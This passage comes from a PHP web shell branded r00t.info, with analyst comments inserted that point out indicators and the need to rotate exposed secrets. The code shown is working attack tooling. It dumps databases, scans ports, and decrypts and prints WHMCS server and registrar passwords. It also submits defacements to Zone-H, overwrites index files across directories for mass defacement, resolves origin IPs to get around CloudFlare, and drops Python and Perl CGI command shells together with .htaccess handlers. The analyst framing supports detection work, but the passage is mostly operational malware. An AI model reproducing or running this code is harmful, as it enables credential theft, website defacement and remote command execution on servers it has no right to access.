mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='ssql'){ fclose ($fp); }else{ gzclose($fp);} /* Sends the finished file back to the requester as an attachment, read in 65536-byte pieces. */ header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'port-sc')) { ?>
  2455.     <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">
  2456.     <?php  echo '<br><br><center><br><b>--==[ Port Scanner ]==--</b><br>'; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is <font color=green>open</font><br>'; } flush(); } }else{ echo '<table class=tabnet style="width:300px;padding:0 1px;">
  2457.   <input type="hidden" name="y" value="phptools">
  2458.   <tr><th colspan="5">Port Scanner</th></center></tr>
  2459.   <tr>
  2460.         <td>Host</td>
  2461.         <td><input type="text" class="inputz"  style="width:220px;color:#FF0000;" name="host" value="localhost"/></td>
  2462.   </tr>
  2463.   <tr>
  2464.         <td>Port start</td>
  2465.         <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="start" value="0"/></td>
  2466.   </tr>
  2467.     <tr><td>Port end</td>
  2468.         <td><input type="text" class="inputz"  style="width:220px;color:#FF0000;" name="end" value="5000"/></td>
  2469.   </tr><td><input class="inputzbut" type="submit" style="color:#FF0000" value="Scan Ports" />
  2470.   </td></form></center></table>'; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hash')) { $submit= $_POST['enter']; if (isset($submit)) { $pass = $_POST['password']; $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; $hash = md5($pass); $md4 = hash("md4",$pass); $hash_md5 = md5($salt.$pass); $hash_md5_double = md5(sha1($salt.$pass)); $hash1 = sha1($pass); $sha256 = hash("sha256",$text); $hash1_sha1 = sha1($salt.$pass); $hash1_sha1_double = sha1(md5($salt.$pass)); } echo '<form action="" method="post"><b><table class=tabnet>'; echo '<tr><th colspan="2">Password Hash</th></center></tr>'; echo '<tr><td><b>Enter the word you want to encrypt:</b></td>'; echo '<td><input class="inputz" type="text" name="password" size="40" />'; echo '<input class="inputzbut" type="submit" name="enter" value="hash" />'; echo '</td></tr><br>'; echo '<tr><th colspan="2">Hash Result</th></center></tr>'; echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>'; echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>'; echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>'; echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>'; echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>'; echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>'; echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>'; echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>'; echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs')) 
{ ?>
  2471. <form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">
  2472.  
  2473. <?php
        // Analyst note: decrypt() reverses an XOR stream scheme keyed by
        // $cc_encryption_hash. The branch that follows on this page calls it on
        // columns read from the tblservers and tblregistrars tables and prints the
        // results, so on a host where this shell is found, the secrets stored in
        // those tables and the encryption hash itself should be treated as exposed
        // and rotated.
        //
        // Steps, as written:
        //  1. key material = md5(md5(hash)) . md5(hash), reduced to raw bytes by _hash()
        //  2. the input is base64-decoded; its first $hash_length bytes are XORed
        //     with the hashed key to recover the IV, which becomes the first
        //     keystream block
        //  3. the remaining bytes are XORed with the keystream; at each
        //     $hash_length boundary the keystream is re-derived as
        //     _hash(current keystream . previous output block)
        // The function contains no integrity check on the decoded data.
        function decrypt ($string,$cc_encryption_hash) { $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash); $hash_key = _hash ($key); $hash_length = strlen ($hash_key); $string = base64_decode ($string); $tmp_iv = substr ($string, 0, $hash_length); $string = substr ($string, $hash_length, strlen ($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length)); } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c])); ++$c; } return $out; }
        // _hash(): SHA-1 of $string (MD5 only when sha1() does not exist), converted
        // from hexadecimal text to raw bytes two hex digits at a time.
        function _hash ($string) { if (function_exists ('sha1')) { $hash = sha1 ($string); } else { $hash = md5 ($string); } $out = ''; $c = 0; while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; }
        echo "
  2474. <br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
  2475. <center>
  2476. <br>
  2477.  
  2478. <FORM action=''  method='post'>
  2479. <input type='hidden' name='form_action' value='2'>
  2480. <br>
  2481. <table class=tabnet style=width:320px;padding:0 1px;>
  2482. <tr><th colspan=2>WHMCS Decoder</th></tr>
  2483. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  2484. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  2485. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  2486. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  2487. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  2488. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  2489. </table>
  2490. </FORM>
  2491. </center>
  2492. "; if($_POST['form_action'] == 2 ) { $db_host=($_POST['db_host']); $db_username=($_POST['db_username']); $db_password=($_POST['db_password']); $db_name=($_POST['db_name']); $cc_encryption_hash=($_POST['cc_encryption_hash']); $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("SELECT * FROM tblservers"); while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo("<center><table border='1'>"); $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>Type</td><td>$type</td></tr>"); echo("<tr><td>Active</td><td>$active</td></tr>"); echo("<tr><td>Hostname</td><td>$hostname</td></tr>"); echo("<tr><td>Ip</td><td>$ipaddress</td></tr>"); echo("<tr><td>Username</td><td>$username</td></tr>"); echo("<tr><td>Password</td><td>$password</td></tr>"); echo "</table><br><br></center>"; } $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("SELECT * FROM tblregistrars"); echo("<center>Domain Reseller <br><table class=tabnet border='1'>"); echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>"); } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'zone')) { ?>
  2493. <form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">
  2494.  
  2495. <br><br><center>
  2496. <!-- Zone-H -->
  2497. <form action="" method='POST'><table><table class='tabnet'><tr>
  2498. <td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
  2499. <input type="text" class="inputz" name="defacer" value="Nama Defacer" />
  2500. <select name="hackmode" class="inputz" >
  2501. <option >------------------------Choose Any------------------------</option>
  2502. <option value="1">Known Vulnerability (i.e. unpatched system)</option>
  2503. <option value="2" >Undisclosed (new) vulnerability</option>
  2504. <option value="3" >Configuration / Admin. Mistake</option>
  2505. <option value="4" >Brute Force Attack</option>
  2506. <option value="5" >Social Engineering</option>
  2507. <option value="6" >Web Server Intrusion</option>
  2508. <option value="7" >Web Server External Module Intrusion</option>
  2509. <option value="8" >Mail Server Intrusion</option>
  2510. <option value="9" >FTP Server Intrusion</option>
  2511. <option value="10" >SSH Server Intrusion</option>
  2512. <option value="11" >Telnet Server Intrusion</option>
  2513. <option value="12" >RPC Server Intrusion</option>
  2514. <option value="13" >Shares Misconfiguration</option>
  2515. <option value="14" >Other Server Intrusion</option>
  2516. <option value="15" >SQL Injection</option>
  2517. <option value="16" >URL Poisoning</option>
  2518. <option value="17" >File Inclusion</option>
  2519. <option value="18" >Other Web Application Bug</option>
  2520. <option value="19" >Remote Administrative Panel Access Bruteforcing</option>
  2521. <option value="20" >Remote Administrative Panel Access Password Guessing</option>
  2522. <option value="21" >Remote Administrative Panel Access Social Engineering</option>
  2523. <option value="22" >Attack Against Administrator(password stealing/sniffing)</option>
  2524. <option value="23" >Access Credentials Through Man In the Middle Attack</option>
  2525. <option value="24" >Remote Service Password Guessing</option>
  2526. <option value="25" >Remote Service Password Bruteforce</option>
  2527. <option value="26" >Rerouting After Attacking The Firewall</option>
  2528. <option value="27" >Rerouting After Attacking The Router</option>
  2529. <option value="28" >DNS Attack Through Social Engineering</option>
  2530. <option value="29" >DNS Attack Through Cache Poisoning</option>
  2531. <option value="30" >Not Available</option>
  2532. </select>
  2533.  
  2534. <select name="reason" class="inputz" >
  2535. <option >-------------Choose Any---------------</option>
  2536. <option value="1" >Heh...just for fun!</option>
  2537. <option value="2" >Revenge against that website</option>
  2538. <option value="3" >Political reasons</option>
  2539. <option value="4" >As a challenge</option>
  2540. <option value="5" >I just want to be the best defacer</option>
  2541. <option value="6" >Patriotism</option>
  2542. <option value="7" >Not available</option>
  2543. </select>
  2544. <input type="hidden" name="action" value="zone">
  2545. <center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
  2546. <br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
  2547. </form></td></tr></table></form>
  2548. <!-- End Of Zone-H -->
  2549. </td></center><br><br>
  2550.  
  2551. <?php echo '<center>'; ob_start(); $sub = get_loaded_extensions(); if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[+] You Must Fill In The Attacker Name![+]");} elseif($method == "--------SELECT--------") {die("[+] You Must Select The Method![+]");} elseif($neden == "--------SELECT--------") {die("[+] You Must Select The Reason![+]");} elseif(empty($site)) {die("[+] You Must Inter the Sites List![+] ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "hxxp") {$sites[$i] = "hxxp://".$sites[$i];} ZoneH("hxxp://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !\n"; ++$i; } echo "[+] Successfully Submitted To Zone-H!! [+]"; echo '</center>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass-cf')) { echo '
  2552. <form method="POST"><br><br>
  2553. <center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">--==[ Bypass
  2554. <font color="#CC0000">CloudFlare</font> ]==--</font></b></p>
  2555. <select class="inputz" name="krz">
  2556.     <option>ftp</option>
  2557.         <option>direct-conntect</option>
  2558.             <option>webmail</option>
  2559.                 <option>cpanel</option>
  2560. </select>
  2561. <input class="inputz" type="text" name="target" value="url">
  2562. <input class="inputzbut" type="submit" value="Bypass"></center>
  2563.  
  2564. '; $target = $_POST['target']; if($_POST['krz'] == "ftp") { $ftp = gethostbyname("ftp."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
  2565. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>"; } if($_POST['krz'] == "direct-conntect") { $direct = gethostbyname("direct-connect."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
  2566. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>"; } if($_POST['krz'] == "webmail") { $web = gethostbyname("webmail."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
  2567. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>"; } if($_POST['krz'] == "cpanel") { $cpanel = gethostbyname("cpanel."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
  2568. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) { if(isset($_POST['gethash'])){ $hash = $_POST['hash']; if(strlen($hash)==32){ $hashresult = "MD5 Hash"; }elseif(strlen($hash)==40){ $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; }elseif(strlen($hash)==13){ $hashresult = "DES(Unix) Hash"; }elseif(strlen($hash)==16){ $hashresult = "MySQL Hash / /DES(Oracle Hash)"; }elseif(strlen($hash)==41){ $GetHashChar = substr($hash, 40); if($GetHashChar == "*"){ $hashresult = "MySQL5 Hash"; } }elseif(strlen($hash)==64){ $hashresult = "SHA-256 Hash"; }elseif(strlen($hash)==96){ $hashresult = "SHA-384 Hash"; }elseif(strlen($hash)==128){ $hashresult = "SHA-512 Hash"; }elseif(strlen($hash)==34){ if(strstr($hash, '$1$')){ $hashresult = "MD5(Unix) Hash"; } }elseif(strlen($hash)==37){ if(strstr($hash, '$apr1$')){ $hashresult = "MD5(APR) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$H$')){ $hashresult = "MD5(phpBB3) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$P$')){ $hashresult = "MD5(Wordpress) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$5$')){ $hashresult = "SHA-256(Unix) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$6$')){ $hashresult = "SHA-512(Unix) Hash"; } }elseif(strlen($hash)==24){ if(strstr($hash, '==')){ $hashresult = "MD5(Base-64) Hash"; } }else{ $hashresult = "Hash type not found"; } }else{ $hashresult = "No Hash Entered"; } ?>
  2569.     <center><br><Br><br>
  2570.    
  2571.         <form action="" method="POST">
  2572.         <tr>
  2573.         <table class="tabnet">
  2574.         <th colspan="5">Hash Identification</th>
  2575.         <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>  <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  2576.         <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  2577.     </table></tr></form>
  2578.     </center>
  2579.    
  2580.     <?php  } elseif(isset($_GET['x']) && ($_GET['x'] == 'python')) { echo "<center/><br/><b>
  2581. --==[ Python  Bypass Exploit ]==--
  2582. </b><br><br>"; mkdir('python', 0755); chdir('python'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!"); $metin = "AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $pythonp = '#!/usr/bin/python
  2583. # 07-07-04
  2584. # v1.0.0
  2585.  
  2586. # cgi-shell.py
  2587. # A simple CGI that executes arbitrary shell commands.
  2588.  
  2589.  
  2590. # Copyright Michael Foord
  2591. # You are free to modify, use and relicense this code.
  2592.  
  2593. # No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
  2594. # Use at your own risk !!!
  2595.  
  2596. # E-mail michael AT foord DOT me DOT uk
  2597. # Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
  2598.  
  2599. """
  2600. A simple CGI script to execute shell commands via CGI.
  2601. """
  2602. ################################################################
  2603. # Imports
  2604. try:
  2605.    import cgitb; cgitb.enable()
  2606. except:
  2607.    pass
  2608. import sys, cgi, os
  2609. sys.stderr = sys.stdout
  2610. from time import strftime
  2611. import traceback
  2612. from StringIO import StringIO
  2613. from traceback import print_exc
  2614.  
  2615. ################################################################
  2616. # constants
  2617.  
  2618. fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
  2619. versionstring = 'Version 1.0.0 7th July 2004'
  2620.  
  2621. if os.environ.has_key("SCRIPT_NAME"):
  2622.     scriptname = os.environ["SCRIPT_NAME"]
  2623. else:
  2624.     scriptname = ""
  2625.  
  2626. METHOD = '"POST"'
  2627.  
  2628. ################################################################
  2629. # Private functions and variables
  2630.  
  2631. def getform(valuelist, theform, notpresent=''):
  2632.     """This function, given a CGI form, extracts the data from it, based on
  2633.    valuelist passed in. Any non-present values are set to '' - although this can be changed.
  2634.    (e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
            # Analyst note: generic form-reading helper. It relies on has_key and
            # on map returning a list, so it is Python 2 code. The main block of
            # this script calls it with the single field name cmd.
  2635.     data = {}
  2636.     for field in valuelist:
  2637.         if not theform.has_key(field):
  2638.             data[field] = notpresent
  2639.         else:
  2640.             if  type(theform[field]) != type([]):
  2641.                 data[field] = theform[field].value
  2642.             else:
  2643.                 values = map(lambda x: x.value, theform[field])     # allows for list type values
  2644.                data[field] = values
  2645.     return data
  2646.  
  2647.  
  2648. theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
  2649. <BODY><CENTER>
  2650. <H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
  2651. <B><I>By Fuzzyman</B></I><BR>
  2652. """+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
  2653.  
  2654. theform = """<H2>Enter Command</H2>
  2655. <FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
  2656. <input name=cmd type=text><BR>
  2657. <input type=submit value="Submit"><BR>
  2658. </FORM><BR><BR>"""
  2659. bodyend = '</BODY></HTML>'
  2660. errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
  2661.  
  2662. ################################################################
  2663. # main body of the script
  2664.  
  2665. if __name__ == '__main__':
            # Analyst note: request handler of the dropped CGI script. Nothing in
            # this script performs authentication; every request that carries a
            # cmd field reaches the os.popen2 call below.
            # The PHP wrapper on this page writes the script as python.izo inside a
            # directory named python, beside an .htaccess holding
            # "AddHandler cgi-script .izo" - those names serve as file-system
            # indicators when hunting for this kit.
  2666.     print "Content-type: text/html"         # this is the header to the server
  2667.    print                                   # so is this blank line
  2668.    form = cgi.FieldStorage()
  2669.     data = getform(['cmd'],form)
  2670.     thecmd = data['cmd']
  2671.     print theformhead
  2672.     print theform
  2673.     if thecmd:
  2674.         print '<HR><BR><BR>'
                # thecmd is written into the HTML response without escaping.
  2675.         print '<B>Command : ', thecmd, '<BR><BR>'
  2676.         print 'Result : <BR><BR>'
  2677.         try:
                    # The cmd value is passed unchanged to os.popen2, so it runs
                    # with the privileges of the CGI process; only the child
                    # stdout is read back and returned in the page.
  2678.             child_stdin, child_stdout = os.popen2(thecmd)
  2679.             child_stdin.close()
  2680.             result = child_stdout.read()
  2681.             child_stdout.close()
  2682.             print result.replace('\n', '<BR>')
  2683.  
  2684.         except Exception, e:                      # an error in executing the command
  2685.            print errormess
                    # The traceback is rendered into the response line by line.
  2686.             f = StringIO()
  2687.             print_exc(file=f)
  2688.             a = f.getvalue().splitlines()
  2689.             for line in a:
  2690.                 print line
  2691.  
  2692.     print bodyend
  2693.  
  2694.  
  2695. """
  2696. TODO/ISSUES
  2697.  
  2698.  
  2699.  
  2700. CHANGELOG
  2701.  
  2702. 07-07-04        Version 1.0.0
  2703. A very basic system for executing shell commands.
  2704. I may expand it into a proper 'environment' with session persistence...
  2705. """'; $file = fopen("python.izo" ,"w+"); $write = fwrite ($file ,base64_decode($pythonp)); fclose($file); chmod("python.izo",0755); echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>
  2706.  
  2707. </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){ $text = $_POST['code']; ?><center><br><br><b>--==[ Script Encode & Decode ]==--</b><br><br>
  2708. <form method="post"><br><br><br>
  2709. <textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
  2710. <select class='inputz' size="1" name="ope">
  2711. <option value="base64">Base64</option>
  2712. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
  2713. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
  2714. </select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  2715. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  2716. </form>
  2717.  
  2718. <?php  $submit = $_POST['submit']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_encode($text); break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text))))); break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text))); break;default:break;}} $submit = $_POST['submits']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_decode($text); break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text))))); break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text))); break;default:break;}} echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')) { echo "<center/><br/><b><font color=#FF0000>--==[ Mass Deface ]==--</font></b><br>"; error_reporting(0);?>
  2719. <form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
  2720. <td><table><table class="tabnet" >
  2721. <form hethot='post'>
  2722. <tr>
  2723.     <tr>
  2724.     <td>&nbsp;&nbsp;Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
  2725.     </tr><br>
  2726.     <tr>
  2727.     <td>File N</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
  2728.     </tr>
  2729. </tr>
  2730. <th colspan='2'><b>Index Code</b></th><br></table>
  2731. <textarea style='background:black;outline:none;' name='index' rows='10' cols='67'>r00t.info A</textarea><br>
  2732. <center><input class='inputzbut' type='submit' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>
  2733.  
  2734. <?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi')) { echo "<center/><br/><b><font color=blue>--==[ cgitelnet.v1  Bypass Exploit]==--</font></b><br><br>"; mkdir('cgitelnet1', 0755); chdir('cgitelnet1'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  2735.  
  2736. AddType application/x-hxxpd-cgi .cin
  2737.  
  2738. AddHandler cgi-script .cin
  2739. AddHandler cgi-script .cin"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $cgishellizocin = '#!/usr/bin/perl -I/usr/local/bandmin
  2740. use MIME::Base64;
  2741. $Version= "CGI-Telnet Version 1.3";
        # Analyst note: the version banner above, the branded HTML fragment below
        # and the clear-text login password are fixed strings in the script as
        # embedded on this page, which makes them usable for file-content
        # signatures. All three are package globals (no "my", no strict).
  2742. $EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>r00t.info - CGI-Telnet</font>";
  2743.  
  2744. $Password = "r00t.info";            # Login password, kept in clear text in the
  2745.                 # script; the code that checks it is outside this view.
  2746. sub Is_Win(){
            # Platform check: returns 1 when the SERVER_SOFTWARE environment
            # variable contains "win" (case-insensitive match), otherwise 0.
            # trim() is called here but defined elsewhere in the script (not in
            # this view). $os is assigned without "my", so it is a package global.
  2747.     $os = &trim($ENV{"SERVER_SOFTWARE"});
  2748.     if($os =~ m/win/i){
  2749.         return 1;
  2750.     }
  2751.     else{
  2752.         return 0;
  2753.     }
  2754. }
  2755. $WinNT = &Is_Win();             # Set automatically from Is_Win(): 1 when the
  2756.                                 # server software string contains "win",
  2757.                                 # otherwise 0. No manual edit is needed,
  2758.                                 # contrary to the original author comment.
  2759.  
  2760. $NTCmdSep = "&";                # This character is used to separate 2 commands
  2761.                                 # in a command line on Windows NT.
  2762.  
  2763. $UnixCmdSep = ";";              # This character is used to separate 2 commands
  2764.                                 # in a command line on Unix.
  2765.  
  2766. $CommandTimeoutDuration = 10000;    # Time in seconds after which commands are
  2767.                                 # killed, per the original author (the code
  2768.                                 # that enforces it is outside this view).
  2769.                                 # The author describes it as Unix-only and
  2770.                                 # advises a small value; the configured
  2771.                                 # 10000 s is itself large.
  2772.  
  2773. $ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
  2774.                                 # browser as soon as it is output, otherwise
  2775.                                 # it is buffered and sent when the command
  2776.                                 # completes, per the original author (the
  2777.                                 # code that reads this flag is outside this
  2778.                                 # view).
  2779.  
  2780. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
  2781.  
        # Platform-dependent values chosen once at load time from $WinNT.
        # How they are consumed is outside this view.
  2782. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  2783. $CmdPwd = ($WinNT ? "cd" : "pwd");
  2784. $PathSep = ($WinNT ? "\\" : "/");
        # NOTE(review): presumably appended to command lines to route stderr into
        # the captured output - usage is not visible here; confirm.
  2785. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
        # NOTE(review): look like display dimensions for an output area - confirm
        # against the page-rendering code.
  2786. $cols= 150;
  2787. $rows= 26;
  2788. #------------------------------------------------------------------------------
  2789. # Reads the input sent by the browser and parses the input variables. It
  2790. # parses GET, POST and multipart/form-data that is used for uploading files.
  2791. # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
  2792. # Other variables can be accessed using $in{'var'}, where var is the name of
  2793. # the variable. Note: Most of the code in this function is taken from other CGI
  2794. # scripts.
  2795. #------------------------------------------------------------------------------
  2796. sub ReadParse
  2797. {
            # Parses the CGI request into the "in" variables: $in holds the raw
            # query string or body, @in the url-encoded pairs, %in the decoded
            # fields. Everything stored comes straight from the request; this sub
            # does no validation of names, values or sizes.
            #
            # When an argument is passed, the glob "in" is aliased to it for the
            # duration of the call.
  2798.     local (*in) = @_ if @_;
  2799.     local ($i, $loc, $key, $val);
  2800.    
            # Result of the match: true when the request is multipart/form-data.
  2801.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  2802.  
  2803.     if($ENV{'REQUEST_METHOD'} eq "GET")
  2804.     {
  2805.         $in = $ENV{'QUERY_STRING'};
  2806.     }
  2807.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
  2808.     {
                # Binary mode only for multipart uploads on Windows; note the
                # operator is the bitwise &, not &&.
  2809.         binmode(STDIN) if $MultipartFormData & $WinNT;
                # Reads CONTENT_LENGTH bytes of body; the return value of read is
                # not checked.
  2810.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  2811.     }
  2812.  
  2813.     # handle file upload data
  2814.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  2815.     {
                # The boundary captured from the Content-Type header is used as
                # the split pattern; it is interpolated without quoting.
  2816.         $Boundary = '--'.$1; # please refer to RFC1867
  2817.         @list = split(/$Boundary/, $in);
                # Only the first part is treated as the uploaded file. The
                # prematch and postmatch of the first blank line give its header
                # and its content; statement order matters here because the
                # match variables are overwritten by any later match.
  2818.         $HeaderBody = $list[1];
  2819.         $HeaderBody =~ /\r\n\r\n|\n\n/;
  2820.         $Header = $`;
  2821.         $Body = $';
  2822.         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  2823.         $in{'filedata'} = $Body;
                # File name as sent by the client, with double quotes and all
                # whitespace removed. No path components are stripped here; what
                # is done with the name is outside this view.
